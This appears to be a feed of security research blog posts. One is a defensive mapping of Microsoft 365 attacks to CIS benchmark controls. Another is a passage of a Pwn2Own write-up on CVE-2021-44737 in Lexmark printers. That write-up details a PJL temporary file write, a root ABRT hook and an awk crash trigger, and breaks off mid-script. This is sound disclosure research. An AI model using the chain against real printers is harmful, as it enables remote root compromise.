ubi0: attached mtd1 (name "mtd=1", size 253 MiB)
ubi0: PEB size: 131072 bytes (128 KiB), LEB size: 126976 bytes
ubi0: min./max. I/O unit sizes: 2048/2048, sub-page size 2048
ubi0: VID header offset: 2048 (aligned 2048), data offset: 4096
ubi0: good PEBs: 2018, bad PEBs: 8, corrupted PEBs: 0
ubi0: user volume: 7, internal volumes: 1, max. volumes count: 128
ubi0: max/mean erase counter: 4/2, WL threshold: 4096, image sequence number: 0
ubi0: available PEBs: 0, total reserved PEBs: 2018, PEBs reserved for bad PEB handling: 32
Loading file '/shared/pm/softoff' to addr 0x1f6545d4...
Unmounting UBIFS volume InternalStorage!
Card did not respond to voltage select!
bootcmd: setenv cramfsaddr 0x1e800000;ubi read 0x1e800000 Kernel 0xb63208;sha256verify 0x1e800000 0x1f363000 1;cramfsload 0x100000 /main.img;source 0x100000;loop.l 0xd0000000 1
Read 11940360 bytes from volume Kernel to 1e800000
Code authentication success
### CRAMFS load complete: 2165 bytes loaded to 0x100000
## Executing script at 00100000
### CRAMFS load complete: 4773552 bytes loaded to 0xa00000
### CRAMFS load complete: 5123782 bytes loaded to 0x1600000
## Booting kernel from Legacy Image at 00a00000 ...
Image Name: Linux-4.17.19-yocto-standard-2f4
Image Type: ARM Linux Kernel Image (uncompressed)
Data Size: 4773488 Bytes = 4.6 MiB
Load Address: 00008000
Entry Point: 00008000
## Loading init Ramdisk from Legacy Image at 01600000 ...
Image Name: initramfs-image-granite2-2021061
Image Type: ARM Linux RAMDisk Image (uncompressed)
Data Size: 5123718 Bytes = 4.9 MiB
Load Address: 00000000
Entry Point: 00000000
## Flattened Device Tree blob at 01500000
Booting using the fdt blob at 0x1500000
Loading Kernel Image ... OK
Using Device Tree in place at 01500000, end 01516b28
UPDATING DEVICE TREE WITH st:1fec4000 sz: 12c000
Starting kernel ...
Booting Linux on physical CPU 0xffff00
Linux version 4.17.19-yocto-standard-2f4d6903b333a60c46f1f33da4b122d1 ([email protected]) (gcc version 7.3.0 (GCC)) #1 SMP PREEMPT Thu Jun 10 20:19:42 UTC 2021
CPU: ARMv7 Processor [410fd034] revision 4 (ARMv7), cr=30c5383d
CPU: div instructions available: patching division code
CPU: PIPT / VIPT nonaliasing data cache, VIPT aliasing instruction cache
OF: fdt: Machine model: mv6220 Lionfish 00d L
earlycon: early_pxa0 at MMIO32 0x00000000d4030000 (options '')
bootconsole [early_pxa0] enabled
FIX ignoring exception 0xa11 addr=a7ff7dfe swapper/0:1
starting version 237
mount: mounting /dev/active-partitions/Base on /newrootfs failed: No such file or directory
Unknown device, --name=, --path=, or absolute path in /dev/ or /sys expected.
mount: mounting /dev/active-partitions/Base on /newrootfs failed: No such file or directory
mount: mounting /dev/active-partitions/Base on /newrootfs failed: No such file or directory
mount: mounting /dev on /newrootfs/dev failed: No such file or directory
mount: mounting /tmp on /newrootfs/var failed: No such file or directory
ln: /newrootfs/var/dev: No such file or directory
BusyBox v1.27.2 (2021-03-11 21:59:45 UTC) multi-call binary.
Usage: switch_root [-c /dev/console] NEW_ROOT NEW_INIT [ARGS]
Free initramfs and switch to another root fs:
chroot to NEW_ROOT, delete all in /, move NEW_ROOT to /,
execute NEW_INIT. PID must be 1. NEW_ROOT must be a mountpoint.
-c DEV Reopen stdio to DEV after switch
Kernel panic - not syncing: Attempted to kill init! exitcode=0x00000100
CPU: 1 PID: 1 Comm: switch_root Tainted: P O 4.17.19-yocto-standard-2f4d6903b333a60c46f1f33da4b122d1 #1
Hardware name: Marvell Pegmatite (Device Tree)
[<c001b3fc>] (unwind_backtrace) from [<c0015b7c>] (show_stack+0x20/0x24)
[<c0015b7c>] (show_stack) from [<c0637468>] (dump_stack+0x78/0x94)
[<c0637468>] (dump_stack) from [<c002f238>] (panic+0xe8/0x27c)
[<c002f238>] (panic) from [<c0034314>] (do_exit+0x61c/0xa6c)
[<c0034314>] (do_exit) from [<c0034818>] (do_group_exit+0x68/0xd0)
[<c0034818>] (do_group_exit) from [<c00348a0>] (__wake_up_parent+0x0/0x30)
[<c00348a0>] (__wake_up_parent) from [<c0009000>] (ret_fast_syscall+0x0/0x50)
Exception stack(0xd2e2dfa8 to 0xd2e2dff0)
dfa0: 480faba0 480faba0 00000001 00000000 00000001 00000001
dfc0: 480faba0 480faba0 00000000 000000f8 00000001 00000000 480ff780 480fc4d0
dfe0: 47faf908 beaa2b74 47fee90c 4805aac4
pegmatite_wdt: set TTCR: 15000
pegmatite_wdt: set APS_TMR_WMR: 6912
CPU0: stopping
CPU: 0 PID: 0 Comm: swapper/0 Tainted: P O 4.17.19-yocto-standard-2f4d6903b333a60c46f1f33da4b122d1 #1
Hardware name: Marvell Pegmatite (Device Tree)
[<c001b3fc>] (unwind_backtrace) from [<c0015b7c>] (show_stack+0x20/0x24)
[<c0015b7c>] (show_stack) from [<c0637468>] (dump_stack+0x78/0x94)
[<c0637468>] (dump_stack) from [<c001913c>] (handle_IPI+0x230/0x338)
[<c001913c>] (handle_IPI) from [<c000a218>] (gic_handle_irq+0xe4/0xfc)
[<c000a218>] (gic_handle_irq) from [<c00099f8>] (__irq_svc+0x58/0x8c)
Exception stack(0xc0999e68 to 0xc0999eb0)
9e60: 00000000 c09f70a4 00000001 00000050 c09f70a4 c09f6f14
9e80: 00000005 c0a09cb4 dfe16598 00000005 00000005 c0999f04 c0999eb8 c0999eb8
9ea0: c0503684 c0503690 60000113 ffffffff
[<c00099f8>] (__irq_svc) from [<c0503690>] (cpuidle_enter_state+0x2bc/0x3a8)
[<c0503690>] (cpuidle_enter_state) from [<c05037f0>] (cpuidle_enter+0x48/0x4c)
[<c05037f0>] (cpuidle_enter) from [<c005f0e4>] (call_cpuidle+0x44/0x48)
[<c005f0e4>] (call_cpuidle) from [<c005f4a0>] (do_idle+0x1e0/0x270)
[<c005f4a0>] (do_idle) from [<c005f7f8>] (cpu_startup_entry+0x28/0x30)
[<c005f7f8>] (cpu_startup_entry) from [<c064bd54>] (rest_init+0xc0/0xe0)
[<c064bd54>] (rest_init) from [<c0913f40>] (start_kernel+0x418/0x4bc)
---[ end Kernel panic - not syncing: Attempted to kill init! exitcode=0x00000100 ]---

The signal integrity due to cable length was a concern and we tried to use a shorter cable, unfortunately with the same results.

At this point the return on investment for the time spent was low, so we decided to better invest the time on reversing the binaries. Turned out it was a good idea as we will see in the second part of this blog coming soon.

✇NCC Group Research

Shaking The Foundation of An Online Collaboration Tool: Microsoft 365 Top 5 Attacks vs the CIS Microsoft 365 Foundation Benchmark

By: Viktor Gazdag

As one of the proud contributors to the Center for Internet Security (CIS) Microsoft 365 Foundation Benchmark, I wanted to raise awareness about the new version release by the Center for Internet Security (CIS) released on February 17th, and how it can help a company to have a secure baseline for their Microsoft 365 tenant.

The first CIS Microsoft 365 Foundation Benchmark was released back in December 2018. Version v1.4.0 has now been released and quoting from the guide, [1]Provides prescriptive guidance for establishing a secure configuration posture for Microsoft 365 Cloud offerings running on any OS. This guide was tested against Microsoft 365, and includes recommendations for Exchange Online, SharePoint Online, OneDrive for Business, Skype/Teams, Azure Active Directory, and Intune.

About the Benchmark

This is a community-driven benchmark that collects input from contributors across different industry sectors and is based on a mutual consensus regarding the issues. This means discussing new and old recommendations at a biweekly meeting or in the online forum via tickets and discussions, proof reading and many more.

There are seven sections, namely:

  1. Account/Authentication
  2. Application Permissions
  3. Data Management
  4. Email Security/Exchange Online
  5. Auditing
  6. Storage
  7. Mobile Device Management.

The sections are defined by four profiles that are based on licensing, security level and effect.

The document follows a nice structure similar to a penetration test report: title, applicability, description, rationale, impact, audit, remediation, default value and CIS control mapping.

Wherever it is possible for a recommendation to be checked in an automated way, the audit and remediation section will include instructions.

At the end of the document, there is a checklist summary table for helping to track each recommendation outcome.

Top 5 Attacks on Microsoft 365 vs CIS Microsoft 365 Foundation Benchmark

Below I’ve shared 5 of the most common ways I’ve seen Microsoft 365 tenants compromised in real-world environments, as well as the corresponding CIS benchmarks that can help prevent these specific weaknesses. The attacks considered below are spamming, phishing, password attacks, malicious apps and data exfiltration.

Let’s see now if the foundation benchmark is effective in preventing these Top 5 attacks.

1. Spamming

Spamming is the use of messaging systems to send multiple unsolicited messages (spam) to large numbers of recipients for the purpose of commercial advertising, for the purpose of non-commercial proselytizing, for any prohibited purpose (especially the fraudulent purpose of phishing), or simply sending the same message over and over to the same user.” [4]

“Microsoft processes more than 400 billion emails each month and blocks 10 million spam and malicious email messages every minute to help protect our customers from malicious emails.” [3]

The CIS Benchmark has the following recommendations against spam:

  • 2.4 Ensure Safe Attachments for SharePoint, OneDrive, and Microsoft Teams is Enabled
  • 4.2 Ensure Exchange Online Spam Policies are set correctly
  • 5.13 Ensure Microsoft Defender for Cloud Apps is Enabled
  • 5.14 Ensure the report of users who have had their email privileges restricted due to spamming is reviewed

2. Phishing

Phishing is when attackers attempt to trick users into doing ‘the wrong thing’, such as clicking a bad link that will download malware, or direct them to a dodgy website.” [5]

“Microsoft Defender for Office 365 blocked more than 35.7 billion phishing and other malicious e-mails targeting enterprise and consumer customers, between January and December 2021.” [2]

The CIS Benchmark has the following recommendations against phishing:

  • 2.3 Ensure Defender for Office Safe Links for Office Applications is Enabled
  • 2.10 Ensure internal phishing protection for Forms is enabled
  • 4.7 Ensure that an anti-phishing policy has been created
  • 4.5 Ensure the Safe Links policy is enabled
  • 5.12 Ensure the spoofed domains report is review weekly
  • 5.13 Ensure Microsoft Defender for Cloud Apps is Enabled

3. Password Brute-Force and Password Spraying

These two types of password attacks differ in volume and order. Brute-forcing a given user’s password will generate a lot of “noise” as an attacker could try millions of passwords for one user from a wordlist before moving to a different user. Password spraying is a type of brute-force attack which tries a common password for all users and then not more than couple more, with delays between every new password try to avoid user lockouts.

“Microsoft (Azure Active Directory) detected and blocked more than 25.6 billion attempts to hijack enterprise customer accounts by brute-forcing stolen passwords, between January and December 2021.” [2]

“Microsoft says MFA adoption remains low, only 22% among Azure AD enterprise customers” [6]

The CIS Benchmark has the following recommendations against brute-force and password spraying:

  • 1.1.1 Ensure multifactor authentication is enabled for all users in administrative roles
  • 1.1.2 Ensure multifactor authentication is enabled for all users in all roles
  • 1.1.5 Ensure that password protection is enabled for Active Directory
  • 1.1.6 Enable Conditional Access policies to block legacy authentication
  • 1.1.8 Enable Azure AD Identity Protection sign-in risk policies
  • 1.1.9 Enable Azure AD Identity Protection user risk policies
  • 1.1.7 Ensure that password hash sync is enabled for resiliency and leaked credential detection
  • 1.1.10 Use Just In Time privileged access to Office 365 roles
  • 5.3 Ensure the Azure AD ‘Risky sign-ins’ report is reviewed at least weekly
  • 5.13 Ensure Microsoft Defender for Cloud Apps is Enabled

4. Malicious Apps

“The Azure Active Directory (Azure AD) application gallery is a collection of software as a service (SaaS) applications that have been pre-integrated with Azure AD.” [5] These SaaS web applications can help automate tasks and extend the functionality of Microsoft 365 services, but there are also add-ons for on-premises Office 365 applications.

The CIS Benchmark has the following recommendations against malicious apps and add-ons:

  • 2.1 Ensure third party integrated applications are not allowed
  • 2.6 Ensure user consent to apps accessing company data on their behalf is not allowed
  • 2.7 Ensure the admin consent workflow is enabled
  • 2.8 Ensure users installing Outlook add-ins is not allowed
  • 2.9 Ensure users installing Word, Excel, and PowerPoint add-ins is not allowed
  • 5.4 Ensure the Application Usage report is reviewed at least weekly
  • 5.13 Ensure Microsoft Defender for Cloud Apps is Enabled

5. Data Exfiltration via Automatic Email Forwarding

Attackers often use built-in functionality to move data out from user mailboxes, and one of the most popular methods is automatic email forwarding rules.

The CIS Benchmark has the following recommendations against automatic email forwarding:

  • 4.3 Ensure all forms of mail forwarding are blocked and/or disabled
  • 4.4 Ensure mail transport rules do not whitelist specific domains
  • 5.7 Ensure mail forwarding rules are reviewed at least weekly
  • 5.13 Ensure Microsoft Defender for Cloud Apps is Enabled

Conclusions

As you have seen from this post, the newest CIS Microsoft 365 Foundation Benchmarks can not only identify weak points in your tenant’s security, but also offer powerful recommendations to introduce specific mitigations against the most high-impact threats to your Microsoft 365 environment.

References

[1] CIS Microsoft 365 Foundation Benchmark: https://www.cisecurity.org/benchmark/microsoft_365

[2] Microsoft Cyber-Signals: https://news.microsoft.com/wp-content/uploads/prod/sites/626/2022/02/Cyber-Signals-E-1.pdf

[3] Office 365 helps secure Microsoft from modern phishing campaigns: https://www.microsoft.com/en-us/insidetrack/office-365-helps-secure-microsoft-from-modern-phishing-campaigns

[4] Wikipedia Spamming: https://en.wikipedia.org/wiki/Spamming

[5] NCSC: Phishing attacks: defending your organisation: https://www.ncsc.gov.uk/guidance/phishing

[5] Overview of the Azure Active Directory application gallery: https://docs.microsoft.com/en-us/azure/active-directory/manage-apps/overview-application-gallery

[6] Azure AD MFA Adaption tweet: https://twitter.com/campuscodi/status/1489647070466170883

✇NCC Group Research

Analyzing a PJL directory traversal vulnerability – exploiting the Lexmark MC3224i printer (part 2)

By: Cedric Halbronn

Summary

This blog post describes a vulnerability found and exploited in October 2021 by Alex Plaskett, Cedric Halbronn, and Aaron Adams working at the Exploit Development Group (EDG) of NCC Group. We successfully exploited it at Pwn2Own 2021 competition in November 2021. Lexmark published a public patch and their advisory in January 2022 together with the ZDI advisory. The vulnerability is now known as CVE-2021-44737.

We decided to target the Lexmark MC3224i printer. However, it seemed to be out of stock everywhere, so we decided to buy a Lexmark MC3224dwe printer instead. The main difference seems to be that the Lexmark MC3224i model has additional fax features whereas the Lexmark MC3224dwe model does not. From an analysis point of view, it means there may be a few differences and most probably we would not be able to target some features. We downloaded the firmware updates for both models and they were exactly the same so we decided to pursue since we didn’t have a choice anyway 🙂

As per Pwn2Own requirements the vulnerability can be exploited remotely, does not need authentication, and exists in the default configuration. It allows an attacker to get remote code execution as the root user on the printer. The Lexmark advisory indicates all the affected Lexmark models.

The following steps described the exploitation process:

  1. A temporary file write vulnerability (CVE-2021-44737) is used to write an ABRT hook file
  2. We remotely crash a process in order to trigger the ABRT abort handling
  3. The abort handling ends up executing bash commands from our ABRT hook file

The temporary file write vulnerability is in the "Lexmark-specific" hydra service (/usr/bin/hydra), running by default on the Lexmark MC3224dwe printer. hydra is a pretty big binary and handles many protocols. The vulnerability is in the Printer Job Language (PJL) commands and more specifically in an undocumented command named LDLWELCOMESCREEN.

We have analysed and exploited the vulnerability on the CXLBL.075.272/CXLBL.075.281 versions but older versions are likely vulnerable too. We detail our analysis on CXLBL.075.272 in this blog post since CXLBL.075.281 was released mid-October, and we had already been working on it.

Note: The Lexmark MC3224dwe printer is based on the ARM (32-bit) architecture, but it didn’t matter for exploitation, just for reversing.

We named our exploit "MissionAbrt" due to triggering an ABRT but then aborting the ABRT.

You said "Reverse Engineering"?

The Lexmark firmware update files that you can download from the Lexmark download page are encrypted. If you are interested to know how our colleague Catalin Visinescu managed to get access to the firmware files using hardware attacks, please refer to our first installment of our blog series.

Vulnerability details

Background

As Wikipedia says:

Printer Job Language (PJL) is a method developed by Hewlett-Packard for switching printer languages at the job level, and for status readback between the printer and the host computer. PJL adds job level controls, such as printer language switching, job separation, environment, status readback, device attendance and file system commands.

PJL commands look like the following:

@PJL SET PAPER=A4
@PJL SET COPIES=10
@PJL ENTER LANGUAGE=POSTSCRIPT

PJL is known to be useful for attackers. In the past, some printers had vulnerabilities allowing to read or write files on the device.

PRET is a tool allowing to talk PJL (among other languages) for several printer’s brands, but it does not necessarily support all of their commands due to each vendor supporting its own proprietary commands.

Reaching the vulnerable function

The hydra binary does not have symbols but has a lot of logging/error functions which contain some function names. The code shown below is decompiled code from IDA/Hex-Rays as no open source has been found for this binary. Lots of PJL commands are registered by setup_pjl_commands() at address 0xFE17C. We are interested in the LDLWELCOMESCREEN PJL command, which seems proprietary to Lexmark and undocumented.

int __fastcall setup_pjl_commands(int a1)
{
// [COLLAPSED LOCAL DECLARATIONS. PRESS KEYPAD CTRL-"+" TO EXPAND]
pjl_ctx = create_pjl_ctx(a1);
pjl_set_datastall_timeout(pjl_ctx, 5);
sub_11981C();
pjlpGrowCommandHandler("UEL", pjl_handle_uel);
...
pjlpGrowCommandHandler("LDLWELCOMESCREEN", pjl_handle_ldlwelcomescreen);
...

When a PJL LDLWELCOMESCREEN command is received, the pjl_handle_ldlwelcomescreen() at 0x1012F0 starts handling it. We see this command takes a string representing a filename as a first argument:

int __fastcall pjl_handle_ldlwelcomescreen(char *client_cmd)
{
// [COLLAPSED LOCAL DECLARATIONS. PRESS KEYPAD CTRL-"+" TO EXPAND]
result = pjl_check_args(client_cmd, "FILE", "PJL_STRING_TYPE", "PJL_REQ_PARAMETER", 0);
if ( result <= 0 )
return result;
filename = (const char *)pjl_parse_arg(client_cmd, "FILE", 0);
return pjl_handle_ldlwelcomescreen_internal(filename);
}

Then, the pjl_handle_ldlwelcomescreen_internal() function at 0x10A200 opens that file. Note that if the file exists, it won’t open that file and returns immediately. Consequently, we can only write files that do not exist yet. Furthermore, the complete directory hierarchy has to already exist in order for us to create the file and we also need to have permissions to write the file.

unsigned int __fastcall pjl_handle_ldlwelcomescreen_internal(const char *filename)
{
// [COLLAPSED LOCAL DECLARATIONS. PRESS KEYPAD CTRL-"+" TO EXPAND]
if ( !filename )
return 0xFFFFFFFF;
fd = open(filename, 0xC1, 0777); // open(filename,O_WRONLY|O_CREAT|O_EXCL, 0777)
if ( fd == 0xFFFFFFFF )
return 0xFFFFFFFF;
ret = pjl_ldwelcomescreen_internal2(0, 1, pjl_getc_, write_to_file_, &fd);// goes here
if ( !ret && pjl_unk_function && pjl_unk_function(filename) )
pjl_process_ustatus_device_(20001);
close(fd);
remove(filename);
return ret;
}

We will analyse pjl_ldwelcomescreen_internal2() below but please note above that the file is closed at the end and then the filename is entirely deleted with the remove() call. This means it seems we can only temporarily write that file.

Understanding the file write

Now let’s analyse the pjl_ldwelcomescreen_internal2() function at 0x115470. It will end up calling pjl_ldwelcomescreen_internal3() due to flag == 0 being passed by pjl_handle_ldlwelcomescreen_internal().

unsigned int __fastcall pjl_ldwelcomescreen_internal2(
int flag,
int one,
int (__fastcall *pjl_getc)(unsigned __int8 *p_char),
ssize_t (__fastcall *write_to_file)(int *p_fd, char *data_to_write, size_t len_to_write),
int *p_fd)
{
// [COLLAPSED LOCAL DECLARATIONS. PRESS KEYPAD CTRL-"+" TO EXPAND]
bad_arg = write_to_file == 0;
if ( write_to_file )
bad_arg = pjl_getc == 0;
if ( bad_arg )
return 0xFFFFFFFF;
if ( flag )
return pjl_ldwelcomescreen_internal3bis(flag, one, pjl_getc, write_to_file, p_fd);
return pjl_ldwelcomescreen_internal3(one, pjl_getc, write_to_file, p_fd);// goes here due to flag == 0
}

We spent some time reversing the pjl_ldwelcomescreen_internal3() function at 0x114838 to understand its internals. This function is quite big and hardly readable decompiled source code is shown below, but the logic is still easy to understand.

Basically this function is responsible for reading additional data from the client and for writing it to the previously opened file.

The client data seems to be received asynchronously by another thread and saved into some other allocations into a pjl_ctx structure. Hence, the pjl_ldwelcomescreen_internal3() function reads one character at a time from that pjl_ctx structure and fills a 0x400-byte stack buffer.

  1. If 0x400 bytes have been received and the stack buffer is full, it ends up writing these 0x400 bytes into the previously opened file. Then, it resets that stack buffer and starts reading more data to repeat that process.
  2. If the PJL command’s footer ("@PJL END DATA") is received, it discards that footer part, then it writes the accumulated received data (of size < 0x400 bytes) to the file, and exits.
unsigned int __fastcall pjl_ldwelcomescreen_internal3(
int was_last_write_success,
int (__fastcall *pjl_getc)(unsigned __int8 *p_char),
ssize_t (__fastcall *write_to_file)(int *p_fd, char *data_to_write, size_t len_to_write),
int *p_fd)
{
unsigned int current_char_2; // r5
size_t len_to_write; // r4
int len_end_data; // r11
int has_encountered_at_sign; // r6
unsigned int current_char_3; // r0
int ret; // r0
int current_char_1; // r3
ssize_t len_written; // r0
unsigned int ret_2; // r3
ssize_t len_written_1; // r0
unsigned int ret_3; // r3
ssize_t len_written_2; // r0
unsigned int ret_4; // r3
int was_last_write_success_1; // r3
size_t len_to_write_final; // r4
ssize_t len_written_final; // r0
unsigned int ret_5; // r3
unsigned int ret_1; // [sp+0h] [bp-20h]
unsigned __int8 current_char; // [sp+1Fh] [bp-1h] BYREF
_BYTE data_to_write[1028]; // [sp+20h] [bp+0h] BYREF
current_char_2 = 0xFFFFFFFF;
ret_1 = 0;
b_restart_from_scratch:
len_to_write = 0;
memset(data_to_write, 0, 0x401u);
len_end_data = 0;
has_encountered_at_sign = 0;
current_char_3 = current_char_2;
while ( 1 )
{
current_char = 0;
if ( current_char_3 == 0xFFFFFFFF )
{
// get one character from pjl_ctx->pData
ret = pjl_getc(&current_char);
current_char_1 = current_char;
}
else
{
// a previous character was already retrieved, let's use that for now
current_char_1 = (unsigned __int8)current_char_3;
ret = 1; // success
current_char = current_char_1;
}
if ( has_encountered_at_sign )
break; // exit the loop forever
// is it an '@' sign for a PJL-specific command?
if ( current_char_1 != '@' )
goto b_read_pjl_data;
len_end_data = 1;
has_encountered_at_sign = 1;
b_handle_pjl_at_sign:
// from here, current_char == '@'
if ( len_to_write + 13 > 0x400 ) // ?
{
if ( was_last_write_success )
{
len_written = write_to_file(p_fd, data_to_write, len_to_write);
was_last_write_success = len_to_write == len_written;
current_char_2 = '@';
ret_2 = ret_1;
if ( len_to_write != len_written )
ret_2 = 0xFFFFFFFF;
ret_1 = ret_2;
}
else
{
current_char_2 = '@';
}
goto b_restart_from_scratch;
}
b_read_pjl_data:
if ( ret == 0xFFFFFFFF ) // error
{
if ( !was_last_write_success )
return ret_1;
len_written_1 = write_to_file(p_fd, data_to_write, len_to_write);
ret_3 = ret_1;
if ( len_to_write != len_written_1 )
return 0xFFFFFFFF; // error
return ret_3;
}
if ( len_to_write > 0x400 )
__und(0);
// append data to stack buffer
data_to_write[len_to_write++] = current_char_1;
current_char_3 = 0xFFFFFFFF; // reset to enforce reading another character
// at next loop iteration
// reached 0x400 bytes to write, let's write them
if ( len_to_write == 0x400 )
{
current_char_2 = 0xFFFFFFFF; // reset to enforce reading another character
// at next loop iteration
if ( was_last_write_success )
{
len_written_2 = write_to_file(p_fd, data_to_write, 0x400);
ret_4 = ret_1;
if ( len_written_2 != 0x400 )
ret_4 = 0xFFFFFFFF;
ret_1 = ret_4;
was_last_write_success_1 = was_last_write_success;
if ( len_written_2 != 0x400 )
was_last_write_success_1 = 0;
was_last_write_success = was_last_write_success_1;
}
goto b_restart_from_scratch;
}
} // end of while ( 1 )
// we reach here if we encountered an '@' sign
// let's check it is a valid "@PJL END DATA" footer
if ( (unsigned __int8)aPjlEndData[len_end_data] != current_char_1 )
{
len_end_data = 1;
has_encountered_at_sign = 0; // reset so we read it again?
goto b_read_data_or_at;
}
if ( len_end_data != 12 ) // len("PJL END DATA") = 12
{
++len_end_data;
b_read_data_or_at:
// will go back to the while(1) loop but exit at the next
// iteration due to "break" and has_encountered_at_sign == 1
if ( current_char_1 != '@' )
goto b_read_pjl_data;
goto b_handle_pjl_at_sign;
}
// we reach here if all "PJL END DATA" was parsed
current_char = 0;
pjl_getc(&current_char); // read '\r'
if ( current_char == '\r' )
pjl_getc(&current_char); // read '\n'
// write all the remaining data (len < 0x400), except the "PJL END DATA" footer
len_to_write_final = len_to_write - 0xC;
if ( !was_last_write_success )
return ret_1;
len_written_final = write_to_file(p_fd, data_to_write, len_to_write_final);
ret_5 = ret_1;
if ( len_to_write_final != len_written_final )
return 0xFFFFFFFF;
return ret_5;
}

The pjl_getc() function at 0xFEA18 allows to retrieve one character from the pjl_ctx structure:

int __fastcall pjl_getc(_BYTE *ppOut)
{
// [COLLAPSED LOCAL DECLARATIONS. PRESS KEYPAD CTRL-"+" TO EXPAND]
pjl_ctx = get_pjl_ctx();
*ppOut = 0;
InputDataBufferSize = pjlContextGetInputDataBufferSize(pjl_ctx);
if ( InputDataBufferSize == pjl_get_end_of_file(pjl_ctx) )
{
pjl_set_eoj(pjl_ctx, 0);
pjl_set_InputDataBufferSize(pjl_ctx, 0);
pjl_get_data((int)pjl_ctx);
if ( pjl_get_state(pjl_ctx) == 1 )
return 0xFFFFFFFF; // error
if ( !pjlContextGetInputDataBufferSize(pjl_ctx) )
_assert_fail(
"pjlContextGetInputDataBufferSize(pjlContext) != 0",
"/usr/src/debug/jobsystem/git-r0/git/jobcontrol/pjl/pjl.c",
0x1BBu,
"pjl_getc");
}
current_char = pjl_getc_internal(pjl_ctx);
ret = 1;
*ppOut = current_char;
return ret;
}

The write_to_file() function at 0x6595C simply writes data to the specified file descriptor:

int __fastcall write_to_file(void *data_to_write, size_t len_to_write, int fd)
{
// [COLLAPSED LOCAL DECLARATIONS. PRESS KEYPAD CTRL-"+" TO EXPAND]
total_written = 0;
do
{
while ( 1 )
{
len_written = write(fd, data_to_write, len_to_write);
len_written_1 = len_written;
if ( len_written < 0 )
break;
if ( !len_written )
goto b_error;
data_to_write = (char *)data_to_write + len_written;
total_written += len_written;
len_to_write -= len_written;
if ( !len_to_write )
return total_written;
}
}
while ( *_errno_location() == EINTR );
b_error:
printf("%s:%d [%s] rc = %d\n", "../git/hydra/flash/flashfile.c", 0x153, "write_to_file", len_written_1);
return 0xFFFFFFFF;
}

From an exploitation perspective, what is interesting is that if we send more than 0x400 bytes, they will be written to that file, and if we refrain from sending the PJL command’s footer, it will wait for us to send more data, before it actually deletes the file entirely.

Note: When sending data, we generally want to send padding data to make sure it reaches a multiple of 0x400 so our controlled data is actually written to the file.

Confirming the temporary file write

There are several CGI scripts showing the content of files on the filesystem. For instance /usr/share/web/cgi-bin/eventlogdebug_se‘s content is:

#!/bin/ash
echo "Expires: Sun, 27 Feb 1972 08:00:00 GMT"
echo "Pragma: no-cache"
echo "Cache-Control: no-cache"
echo "Content-Type: text/html"
echo
echo "<HTML><HEAD><META HTTP-EQUIV=\"Content-type\" CONTENT=\"text/html; charset=UTF-8\"></HEAD><BODY><PRE>"
echo "[++++++++++++++++++++++ Advanced EventLog (AEL) Retrieved Reports ++++++++++++++++++++++]"
for i in 9 8 7 6 5 4 3 2 1 0; do
if [ -e /var/fs/shared/eventlog/logs/debug.log.$i ] ; then
cat /var/fs/shared/eventlog/logs/debug.log.$i
fi
done
echo "[+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++]"
echo ""
echo ""
echo "[++++++++++++++++++++++ Advanced EventLog (AEL) Configurations ++++++++++++++++++++++]"
rob call applications.eventlog getAELConfiguration n
echo "[+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++]"
echo "</PRE></BODY></HTML>"

Consequently, we write /var/fs/shared/eventlog/logs/debug.log.1 file with lots of A using the previously discussed temporary file write primitive.

We confirm the file is successfully written by accessing the CGI page:

From testing, we noticed that the file would be automatically deleted between 1min and 1min40, probably due to a timeout in the PJL handling in hydra. This means we are fine to use that temporary file primitive for 60 seconds.

Exploitation

Exploiting the crash event handler aka ABRT

We spent quite some time trying to find a way to execute code. We caught a break when we noticed several configuration files that define what to do when a crash occurs:

$ ls ./squashfs-root/etc/libreport/events.d
abrt_dbus_event.conf      emergencyanalysis_event.conf  rhtsupport_event.conf  vimrc_event.conf
ccpp_event.conf           gconf_event.conf              smart_event.conf       vmcore_event.conf
centos_report_event.conf  koops_event.conf              svcerrd.conf
coredump_handler.conf     print_event.conf              uploader_event.conf

For instance, coredump_handler.conf allows to execute shell commands:

# coredump-handler passes /dev/null to abrt-hook-ccpp which causes it to write
# an empty core file. Delete this file so we don't attempt to use it.
EVENT=post-create type=CCpp
    [ "$(stat -c %s coredump)" != "0" ] || rm coredump

The following page describes well how ABRT works:

If a program developer (or package maintainer) requires some specific information which ABRT is not
collecting, they can write a custom ABRT hook which collects the required data for his program
(package). Such hook can be run at a different time during the problem processing depending on how
"fresh" the information has to be. It can be run:

1. at the time of the crash
2. at the time when user decides to analyse the problem (usually run gdb on it)
3. at the time of reporting

All you have to do is create a .conf and place it to /etc/libreport/events.d/ from this template:

EVENT=<EVENT_TYPE> [CONDITIONS]
   <whatever command you like>

The commands will execute with the current directory set to the problem directory (e.g:
/var/spool/abrt/ccpp-2012-05-17-14:55:15-31664)

If you need to collect the data at the time of the crash you need to create a hook that will be run as 
a post-create event.

WARNING: post-create events are run with root privileges!

From the above we can determine we need a post-create event and we know it will be executed as root if/when a crash event is actually handled by ABRT.

Finding a process crash

There are several ways to crash a process, and it seems that it usually creates a blue screen of death (BSOD) and then the printer reboots:

Such a process crash is enough to trigger the ABRT behaviour. Once we have such a process crash, abrtd should trigger the post-create event of our controlled file. By starting our own process (e.g. netcat, ssh) that never returns, we can avoid that the crash handling process continues and it will never result in a BSOD.

We abuse a bug in awk to trigger the crash. The version of awk used on the printer is quite old, so it had some bugs that don’t appear to exist on more modern versions. On the device if an awk command is run on a non-existent file, then an invalid free() can be triggered:

# awk 'match($10,/AH00288/,b){a[b[0]]++}END{for(i in a) if (a[i] > 5) print a[i]}' /tmp/doesnt_exist
free(): invalid pointer
Aborted

In order to trigger this remotely we abuse a race condition that exists due to the second-based granularity (%S format specifier) used for naming log files in apache2. The configuration has the following line:

ErrorLog "|/usr/sbin/rotatelogs -L '/run/log/apache_error_log' -p '/usr/bin/apache2-logstat.sh' /run/log/apache_error_log.%Y-%m-%d-%H_%M_%S 32K"

The above will trigger a log rotation for every 32KB of logs that are generated, with the resulting log file having a name that is unique, but only at a one second granularity. As a result, if enough HTTP logs are generated such that rotation occurs twice within one second, then two instances of apache2-logstat.sh may be parsing a file with the same name at the same time. In apache2-logstat.sh we see the following:

#!/bin/sh
file_to_compress="${2}"
path_to_logs="/run/log/"
compress_exit_code=0
to_restart=0
rm -f "${path_to_logs}"apache_error_log*.tar.gz
if [[ "${file_to_compress}" ]]; then
echo "Compressing ${file_to_compress} ..."
tar -czf "${file_to_compress}.tar.gz" "${file_to_compress}"
compress_exit_code=${?}
if [[ ${compress_exit_code} == 0 ]]; then
